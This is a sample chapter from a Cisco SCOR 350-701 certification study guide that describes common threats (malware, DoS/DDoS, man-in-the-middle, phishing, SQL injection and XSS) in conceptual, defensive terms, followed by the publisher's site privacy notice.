Home > Articles

Security Concepts

In this sample chapter, you will learn fundamental concepts of common threats against on-premises and cloud environments, and the impact of moving to the cloud has on your security threat model. You will also learn about data breaches, insecure APIs, DoS and DDoS, and VPN types. This chapter covers SCOR 350-701 exam objectives.

This chapter is from the book

This chapter prepares you for exam questions related to security concepts of the SCOR 350-701 exam. You will learn fundamental concepts of common threats against on-premises and cloud environments, and with many workloads moving to the cloud, this shifts and impacts your security threat model.

This chapter also covers data breaches, insecure APIs, denial of service (DoS) and distributed denial of service (DDoS), and compromised credentials. We will also discuss the functions of the cryptography components and get into various virtual private network (VPN) types.

Explain Common Threats Against On-Premises and Cloud Environments

For over three decades, data assets remained tied to the corporate headquarters and data centers. With the advent of cloud computing, co-location, managed hosting, and Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS), the threats to these systems haven’t been eliminated or reduced. They have simply shifted, and new types of threats have even been created. Two threats that are often overlooked are the availability of technical resources and the expertise to support these systems. When we are unable to staff well-trained persons capable of identifying, mitigating, responding to, and recovering from attacks, we are at higher risk of threats being missed and attackers impacting operations.

Common Threats Against On-Premises Assets

Common on-premises threats include viruses, Trojans, DoS/DDoS attacks, phishing, rootkits, MitM attacks, SQL injection, cross-site scripting, and malware.

When defending on-premises assets from threats, we must first have a good accounting of what those threats consist of, which can range from software, firmware, hardware, and systems to the operating system (OS) versions, patches, and each of their exposures to threats. The three most common assets for any company are:

  • First and foremost, employees are the number-one asset. Without them, there is no innovation, product, or sales.

  • Second is data, which contains company proprietary information. Understand that data drives business operations.

  • Third is the systems themselves, their ability to provide service, and their availability (that they are online and ready to use when needed).

Table 1-1 provides an overview of these three assets and some of their threats and mitigations.

TABLE 1-1 Assets and Threats

Assets

Threats

Mitigations

Employees

Phishing, malware, virus, ransomware

Security awareness and training programs

Data, trade secrets

Ransomware, corruption, deletion, exfiltration

Offline/offsite backups, data leak prevention (DLP)

Systems, compute

Malware, OS and firmware attacks, DDoS

Updates, patches

Let’s take a closer look at the first asset—people. Protecting employees from cyber criminals and potential workplace hazards, such as a hacker gaining control of a power generation plant or water supply, is necessary. While employees can be a company’s greatest asset, they can also be its weakest link.

Employees can be social-engineered, phished, have their endpoints infected with a virus, or they can download ransomware, malware, or other Trojans that could comprise employee personal data as well as spread and affect the corporate networks. Securing the employees should be one of a company’s top priorities. Employee awareness programs, monthly awareness newsletters, quarterly training, and biannual training and certification programs can help reduce the negative impacts. Some companies hire phishing companies to try and trick users and then warn them they could have been compromised. Employees can also be insider threats. An employee who is angry or not happy with their position or pay could sabotage or sell intellectual property.

Another highly valuable item is the companies’ data. Data often holds the company’s customers, products, research, and trade secrets. Attackers could be looking to steal the data to resell it, corrupt the data to harm the business, or encrypt it with cryptography for ransomware and hold the organization hostage. Data is what drives business decisions and provides the organizations with a potential advantage over their competition.

Finally, the systems themselves that serve up the data can be a target. Hackers can attack the operating system, modify firmware, set up man-in-the-middle attacks, perform code or SQL injections, and code errors causing scripting vulnerabilities. Once an attacker has access to the underlying host (operating system or apps), they can impact performance, steal data, redirect data flow, and make the system unavailable for usage. The various types of attackers are summarized in Table 1-2 along with their capabilities.

TABLE 1-2 Attacker Types and Capabilities and Motivations

Hacker Type

Capabilities/Motivations

Black hat

Motivated by money, revenge, or notoriety and wants to sabotage and do harm to systems.

White hat

Generally, the good person who finds vulnerabilities.

Gray hat

An explorer, may do iffy type activity, or may have done borderline bad things. Typically is engaged in the discovery of “what if.”

State sponsored

Government-sanctioned hackers or hackers hired to attack other governments.

Hacktivist

Hacking and leaking data as a noble cause.

Cyber terrorist

Causes maximum harm to an organization; usually tied to publicity.

Suicide hacker

Knows they will get caught, wants to cause damage, and understands there is a consequence.

Script kiddie

No real skills, likes to point and click, uses tools and scripts of others.

Physical attacker

Has physical access to systems and wants to cause damage.

The most advanced attackers are nation-state actors and organized crime. With unlimited budgets and resources, they tend to be formidable adversaries. Generally defending against attackers requires understanding their motivation. Table 1-2 lists the most common types. This context will best position you to stop them when you encounter them in the wild. Nation-states usually target governments, utilities, and businesses, with the intent to disrupt capabilities, steal trade secrets, and extort money.

Another on-premises threat is keyloggers, which can be software or hardware based and can be used on any device, such as a PC, server, tablet, or phone. Keyloggers are used to monitor all keystrokes and send them off the system via a covert channel. This way, attackers can obtain your passwords and much more.

Before we get into malware, viruses, Trojans, and vulnerabilities, let’s review some terms:

  • Threat: Any potential danger to an asset, such as theft, fire, water, natural disaster, an attacker, and so on.

  • Vulnerability: A weakness in a system, system design, or its implementation. Can be in hardware and software. No software or hardware is immune to vulnerabilities.

  • Exploit: A script or tool that can take advantage of a vulnerability. An exploit leads to access.

Threats come in many shapes, sizes, and delivery methods. Someone can steal your compute device, such as your laptop or phone, or just the data on your systems. Your data center can be exposed to a fire, flood, or a natural disaster. Vulnerabilities can be defined as a weakness in hardware, firmware, or software, and they can be the result of a misconfiguration or a system design flaw. To identify vulnerabilities, a program was developed by MITRE, called the Common Vulnerabilities and Exposure, or CVE. The format of each vulnerability is the “year” and the “ID” assigned, such as CVE-2023-1234. This allows everyone to be on the same page. As defined previously, an exploit is a script, code, or a tool, much like a recipe, designed to take advantage of a weakness in firmware, OS, software package, or system. Exploits generally lead to privilege escalation, loss of integrity, or denial of service. A collection of exploits built into a tool is called an attack framework. Examples include Metasploit, Cobalt Strike, and Immunity Canvas. Professionals use these tools to help find weaknesses and then help an organization defend against those weaknesses, whereas attackers use them to carry out automated, widespread, multiple attacks with a single click. In Table 1-3, we examine the types of attacks and their effects.

TABLE 1-3 Types of Attacks

Malware

Virus

A malicious computer program that, when executed, inserts its own code into computer programs and replicates itself. A virus is designed to spread.

Trojan

A malicious computer program posing as a useful program that, when executed, creates backdoors for hackers to access the system(s).

Ransomware

Malicious script or code that allows an attacker to execute unauthorized actions on a victim’s system and lock them out of the data by encrypting it. Hackers demand ransom for decrypting the data.

Denial of service (DoS)

Direct

Generates packets sent to the victim or target system to overload the target system and deny legitimate users’ access to the system.

Reflected

Spoofing an unwilling system to originate the DoS attack.

Amplification attack

Spoofing attack where the response is larger than the query, such as the DNS query response is larger than the initial query.

Botnet DDoS

Many (zombie) systems make up a botnet under the control of the attacker who requests all of them to initiate traffic to the target.

Phishing

An email attack

Emails purporting to be from a reputable company in order to induce an individual to expose their data or system to an attacker.

Rootkit

System, low-level attack

Infects at a low level in order to manipulate information reported on the system to stay hidden.

Man-in-the-middle attack (also known as an on-path attack)

Attacker sits between the victim and the destination

MitM Attacks on-path attacks are hard to detect and give the attacker ability to inject data into the stream.

SQL injection

SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed.

SQL injection process works by prematurely terminating a text string and appending a new command.

Cross-site scripting (XSS)

Malicious JavaScript is executed in the user’s browser, recording all the user’s interactions with the site.

Cross-site scripting occurs when attackers or malicious users can manipulate a website or web application to return malicious JavaScript to users.

Viruses and worms are scripts or program code mobilized to exploit a weakness in a system. Since the dawn of PC computers in the mid-1980s, there have been viruses, and in 1988 the infamous Morris Worm infiltrated the Internet. A virus requires human interaction such as opening an email attachment, accessing a file, or clicking an executable. The unique characteristic of a virus is that it requires people to interact with a file or program to start the infection. All viruses contain search, infection, and payload routines. The search routine will locate new storage space, files, RAM, and available hard disk space. Then the infection routine will multiply the virus by attaching itself to any vulnerable items found. Finally, a payload, which is designed to do harm, such as altering, encrypting, or deleting files or exfiltrating data, is executed. Modern viruses steal or exfiltrate files and data or delete files to cause issues. More recently, ransomware variants encrypt files and hold the data ransom until the company pays for the key to decrypt. Virus propagation is done by infecting files, the computer’s master boot record (MBR), and macros, and it’s accomplished across the network by scanning for vulnerable systems to spread to. More advanced viruses have anti-detection stealth capabilities so they may run in a virtual machine, disable antivirus software, or hide messages from the operating system indicating that there is malware.

Malware is a catch-all term that describes any malicious software that is designed to act badly. Examples include viruses, Trojans, spyware, adware, and ransomware. Malware writers obfuscate their programs to avoid detection by security controls as long as possible. There are many different infection and payload techniques. Profiling and search routines look to find new files to infect and to determine if the system is “infection worthy” by checking available RAM and disk space. A second component of the malware/virus is the infection routine that looks to copy itself to other files and systems. Payload can mean different things. It can just be the routine set to erase the entire disk, it can generate pop-ups to get the user to click them, or it can use the address book in the user’s email application to propagate the malware to their contacts.

Trojans are typically programs that appear to do one thing but instead do something quite different—typically a malicious act. Some “Trojaned” PDF and Word documents will drop files to the target’s hard disk and set up a method to auto-load other programs. A remote access Trojan (RAT) is one such program and is used to gain full control of a system. Click-fraud Trojans are feed lists of sites to visit to help the fraudster make money by causing infected computers to visit specific sites with ads. There are data-hiding Trojans that will hide themselves and user data from view. E-banking Trojans intercept and use the victim’s bank information for financial gain. DoS, FTP, and proxy Trojans allow attackers to use the victim’s computer to attack other systems.

Spyware monitors the system’s usage, such as the websites you browse, files you work on, calls you make, text messages you send, photos you take, programs you run, and games you play. Consider it surveillance. This information is sent to various third parties such as criminals, marketing companies, nation-states, law enforcement, and others. This information can then be used to market directly to you, cause pop-ups and hijack and redirect your browser to specific sites, or to steal your data and photos. Reporters have seen this done to them by nation-states that use the collected data to intimidate and silence opposition.

Distribution of viruses and malware is done via a wrapper (also known as a binder or packager) used to avoid detection by antivirus software. It combines two or more executables into a single packaged program and makes it more difficult to discern its intent. For example, you could download a game from an untrustworthy website, the game or its packer would be the Trojan, and when its executed, it launches a second program (a virus), which starts to perform its nefarious actions. Packers (which can be custom or off the shelf) such as winrar, winzip, and tar are used to compress and obfuscate the code, making it harder for antivirus software to read. The idea is to prevent viewing of the true intent of the code until it is placed in memory.

Crypters are specifically designed packers with the sole purpose of encrypting and obscuring the malware code to avoid detection. More advanced crypters use advanced algorithms such as AES and Blowfish. Crypters are becoming a more common way to avoid detection by antivirus and intrusion detection systems (IDSs).

Droppers are single-purposed software designed to install malware on the victim’s system. They utilize a host of complex antidetection techniques to avoid discovery and evade security controls.

Rootkits utilize advanced persistent threat (APT) methods to infect the system, and they typically hide at a very low level on a device, such as the boot sector or drivers. Rootkits remain quiet in the background. This allows them to intercept and change the operating system processes so that they can stay hidden and exfiltrate data unseen. After a rootkit infects a device, you cannot trust any information that the device reports about itself, and a complete rebuild is generally required. A rootkit can display all the information on the system and exclude anything associated with itself so that the system looks normal.

Man-in-the-middle attacks can use many different techniques. We will discuss a few here. The first method is IP spoofing, where every device on a network has an IP address and MAC address. By spoofing an IP address, an attacker can redirect traffic to their device first and then forward it out, where you wouldn’t even be aware of the interception. This is typically done via ARP poisoning. Here are some other techniques use for MitM attacks:

  • ARP spoofing is where the attacker floods the network with ARP misinformation, pointing all devices to itself.

  • Session hijacking (or cookie theft) happens when the attacker sits between a system and a web resource and collects cookies and tokens and then replays them on certain websites so they look like the original connection. This allows the attacker to gain access to your email, banking website, and more.

  • DNS spoofing or DNS cache poisoning is where the attacker corrupts the Domain Name System’s resolver cache function, thus diverting the user to the attacker’s website.

  • Wi-Fi eavesdropping is where the attacker creates a twin network, and because of its proximity and signal strength, the victim connects to the attacker’s fake network, allowing the attacker to intercept all traffic, messages, passwords, and more.

  • SSL stripping involves the attacker downgrading the communication between the client and the server to an unencrypted format to be able to intercept cleartext traffic. The user may notice the lock icon in the address bar has changed to “untrusted.” There is a tool called SSLstrip, created by Moxie Marlinspike, that tests if an implementation is vulnerable to this attack. It allows for interception of web server traffic, and when an HTTPS URL is encountered, SSLstrip replaces it with an HTTP link and keeps a mapping of the change.

In Table 1-4, we examine the attack methods, activity types, and results of the attack.

TABLE 1-4 MitM Attack Methods

Attack Method

Attack Activity

Attack Results

IP spoofing

Spoofing the IP and MAC addresses

ARP spoofing allows an attacker to broadcast the default route to redirect traffic to itself.

DNS spoofing

Poisoning the DNS

Corrupts the Domain Name System data and introduces incorrect results.

Wi-Fi eavesdropping

Creating a fake access point

Attacker creates a twin network that the victim connects to, allowing for the interception of all traffic.

SSL stripping/hijacking

Downgrading the connection from HTTPS to HTTP

Attacker intercepts HTTPS traffic and strips the “S,” resulting in an HTTP connection.

Browser cookie theft

Hijacking a session

The attacker collects the cookies (“tokens”) the user is sending over the network and then replays them to trick the receiving end.

Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks are designed to disrupt, disable, and deny service to legitimate users of a system or program. They do this by flooding a network or system with requests or crafted network traffic. The most common method is an ICMP (ping) attack, where many hosts will send ICMP requests to a single host, overwhelming it and causing a depletion of available resources (RAM, network, and CPU). DoS attacks are typically against a single host, whereas DDoS attacks involve multiple machines attacking a single host. These can be done either on a local network or externally with a command and control (C2) network such as a botnet.

Phishing attacks are generally designed to trick a user into interacting with an email. This can allow the attacker to steal sensitive user data such as login credentials and passwords in order to get a foothold on the victim’s network/systems. This attack is a social engineering attack and is most often achieved through email. Many of these emails are spoofed and meant to look like something the user would trust, basically tricking the user into doing something that is harmful to their organization or themselves.

SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of a SQL Server database for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries it receives. Even parameterized data can be manipulated by a skilled and determined attacker.

The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and then executed. A less-direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed. The injection process works by prematurely terminating a text string and appending a new command. Because the inserted command may have additional strings appended to it before it is executed, the attacker can string commands together.

SQL is a well-known standard language used for accessing and interacting with databases. As previously mentioned, SQL injections specifically attack database resources, usually through web applications. If a backend SQL database has a vulnerability or was not set up securely, an attacker can make specially crafted requests to trick, for example, a web login form. Instead of logging in, the injection can request data from the database, such as usernames and passwords, private data, or it can interact and modify the data. There are three types of SQL injections, as described in the following list:

  • In-band SQL injection: The requested data is visible directly on the response web application or web page, allowing the attacker to copy the page off to their system.

  • Out-of-band SQL injection: The attacker performs a specially crafted request, and the data is transmitted via an email or inside a file. The data is sent to the attacker’s system or a C2 collector, ultimately ending up with the attacker.

  • Blind SQL injection: This is where the attacker crafts many special requests to illicit responses from the database to learn more about it. Based on each response, even if the database isn’t displaying data back, it might display errors that lead the attacker to understand the structure of the database and its type, version, or brand.

Cross-site scripting (XSS) attacks come in three types. Cross-site scripting occurs when attackers or malicious users can manipulate a website or web application to return malicious JavaScript to users. When this malicious JavaScript is executed in the user’s browser, all the user’s interactions with the site (including but not limited to authentication and payment) can be compromised by the attacker.

DOM-based XSS is a type of cross-site scripting that occurs when user input is manipulated in an unsafe way in the DOM (Document Object Model) by JavaScript. For example, this can occur if you were to read a value from a form and then use JavaScript to write it back out to the DOM.

Reflected XSS occurs when the web server receives an HTTP request and “reflects” information from the request back into the response in an unsafe manner. An example would be when the server places the requested application route/URL in the page that is served back to the user. An attacker can construct a URL with a malicious route that contains JavaScript, such that if a user visits the link, the script will execute.

Stored XSS occurs when user-created data is stored in a database or other persistent storage and is then loaded into a page. Common examples of types of applications that do this include comment areas, forums, response plug-ins, and similar applications. Stored XSS is particularly dangerous when the stored content is displayed to many or all users of the application, because then one user can compromise the site for any user who visits it, without requiring that they click a specific link.

Pearson IT Certification Promotional Mailings & Special Offers

I would like to receive exclusive offers and hear about products from Pearson IT Certification and its family of brands. I can unsubscribe at any time.

Overview


Pearson Education, Inc., 221 River Street, Hoboken, New Jersey 07030, (Pearson) presents this site to provide information about Pearson IT Certification products and services that can be purchased through this site.

This privacy notice provides an overview of our commitment to privacy and describes how we collect, protect, use and share personal information collected through this site. Please note that other Pearson websites and online products and services have their own separate privacy policies.

Collection and Use of Information


To conduct business and deliver products and services, Pearson collects and uses personal information in several ways in connection with this site, including:

Questions and Inquiries

For inquiries and questions, we collect the inquiry or question, together with name, contact details (email address, phone number and mailing address) and any other additional information voluntarily submitted to us through a Contact Us form or an email. We use this information to address the inquiry and respond to the question.

Online Store

For orders and purchases placed through our online store on this site, we collect order details, name, institution name and address (if applicable), email address, phone number, shipping and billing addresses, credit/debit card information, shipping options and any instructions. We use this information to complete transactions, fulfill orders, communicate with individuals placing orders or visiting the online store, and for related purposes.

Surveys

Pearson may offer opportunities to provide feedback or participate in surveys, including surveys evaluating Pearson products, services or sites. Participation is voluntary. Pearson collects information requested in the survey questions and uses the information to evaluate, support, maintain and improve products, services or sites; develop new products and services; conduct educational research; and for other purposes specified in the survey.

Contests and Drawings

Occasionally, we may sponsor a contest or drawing. Participation is optional. Pearson collects name, contact information and other information specified on the entry form for the contest or drawing to conduct the contest or drawing. Pearson may collect additional personal information from the winners of a contest or drawing in order to award the prize and for tax reporting purposes, as required by law.

Newsletters

If you have elected to receive email newsletters or promotional mailings and special offers but want to unsubscribe, simply email information@informit.com.

Service Announcements

On rare occasions it is necessary to send out a strictly service related announcement. For instance, if our service is temporarily suspended for maintenance we might send users an email. Generally, users may not opt-out of these communications, though they can deactivate their account information. However, these communications are not promotional in nature.

Customer Service

We communicate with users on a regular basis to provide requested services and in regard to issues relating to their account we reply via email or phone in accordance with the users' wishes when a user submits their information through our Contact Us form.

Other Collection and Use of Information


Application and System Logs

Pearson automatically collects log data to help ensure the delivery, availability and security of this site. Log data may include technical information about how a user or visitor connected to this site, such as browser type, type of computer/device, operating system, internet service provider and IP address. We use this information for support purposes and to monitor the health of the site, identify problems, improve service, detect unauthorized access and fraudulent activity, prevent and respond to security incidents and appropriately scale computing resources.

Web Analytics

Pearson may use third party web trend analytical services, including Google Analytics, to collect visitor information, such as IP addresses, browser types, referring pages, pages visited and time spent on a particular site. While these analytical services collect and report information on an anonymous basis, they may use cookies to gather web trend information. The information gathered may enable Pearson (but not the third party web trend services) to link information with application and system log data. Pearson uses this information for system administration and to identify problems, improve service, detect unauthorized access and fraudulent activity, prevent and respond to security incidents, appropriately scale computing resources and otherwise support and deliver this site and its services.

Cookies and Related Technologies

This site uses cookies and similar technologies to personalize content, measure traffic patterns, control security, track use and access of information on this site, and provide interest-based messages and advertising. Users can manage and block the use of cookies through their browser. Disabling or blocking certain cookies may limit the functionality of this site.

Do Not Track

This site currently does not respond to Do Not Track signals.

Security


Pearson uses appropriate physical, administrative and technical security measures to protect personal information from unauthorized access, use and disclosure.

Children


This site is not directed to children under the age of 13.

Marketing


Pearson may send or direct marketing communications to users, provided that

  • Pearson will not use personal information collected or processed as a K-12 school service provider for the purpose of directed or targeted advertising.
  • Such marketing is consistent with applicable law and Pearson's legal obligations.
  • Pearson will not knowingly direct or send marketing communications to an individual who has expressed a preference not to receive marketing.
  • Where required by applicable law, express or implied consent to marketing exists and has not been withdrawn.

Pearson may provide personal information to a third party service provider on a restricted basis to provide marketing solely on behalf of Pearson or an affiliate or customer for whom Pearson is a service provider. Marketing preferences may be changed at any time.

Correcting/Updating Personal Information


If a user's personally identifiable information changes (such as your postal address or email address), we provide a way to correct or update that user's personal data provided to us. This can be done on the Account page. If a user no longer desires our service and desires to delete his or her account, please contact us at customer-service@informit.com and we will process the deletion of a user's account.

Choice/Opt-out


Users can always make an informed choice as to whether they should proceed with certain services offered by Adobe Press. If you choose to remove yourself from our mailing list(s) simply visit the following page and uncheck any communication you no longer want to receive: www.pearsonitcertification.com/u.aspx.

Sale of Personal Information


Pearson does not rent or sell personal information in exchange for any payment of money.

While Pearson does not sell personal information, as defined in Nevada law, Nevada residents may email a request for no sale of their personal information to NevadaDesignatedRequest@pearson.com.

Supplemental Privacy Statement for California Residents


California residents should read our Supplemental privacy statement for California residents in conjunction with this Privacy Notice. The Supplemental privacy statement for California residents explains Pearson's commitment to comply with California law and applies to personal information of California residents collected in connection with this site and the Services.

Sharing and Disclosure


Pearson may disclose personal information, as follows:

  • As required by law.
  • With the consent of the individual (or their parent, if the individual is a minor)
  • In response to a subpoena, court order or legal process, to the extent permitted or required by law
  • To protect the security and safety of individuals, data, assets and systems, consistent with applicable law
  • In connection the sale, joint venture or other transfer of some or all of its company or assets, subject to the provisions of this Privacy Notice
  • To investigate or address actual or suspected fraud or other illegal activities
  • To exercise its legal rights, including enforcement of the Terms of Use for this site or another contract
  • To affiliated Pearson companies and other companies and organizations who perform work for Pearson and are obligated to protect the privacy of personal information consistent with this Privacy Notice
  • To a school, organization, company or government agency, where Pearson collects or processes the personal information in a school setting or on behalf of such organization, company or government agency.

Links


This web site contains links to other sites. Please be aware that we are not responsible for the privacy practices of such other sites. We encourage our users to be aware when they leave our site and to read the privacy statements of each and every web site that collects Personal Information. This privacy statement applies solely to information collected by this web site.

Requests and Contact


Please contact us about this Privacy Notice or if you have any requests or questions relating to the privacy of your personal information.

Changes to this Privacy Notice


We may revise this Privacy Notice through an updated posting. We will identify the effective date of the revision in the posting. Often, updates are made to provide greater clarity or to comply with changes in regulatory requirements. If the updates involve material changes to the collection, protection, use or disclosure of Personal Information, Pearson will provide notice of the change through a conspicuous notice on this site or other appropriate way. Continued use of the site after the effective date of a posted revision evidences acceptance. Please contact us if you have questions or concerns about the Privacy Notice or any objection to any revisions.

Last Update: November 17, 2020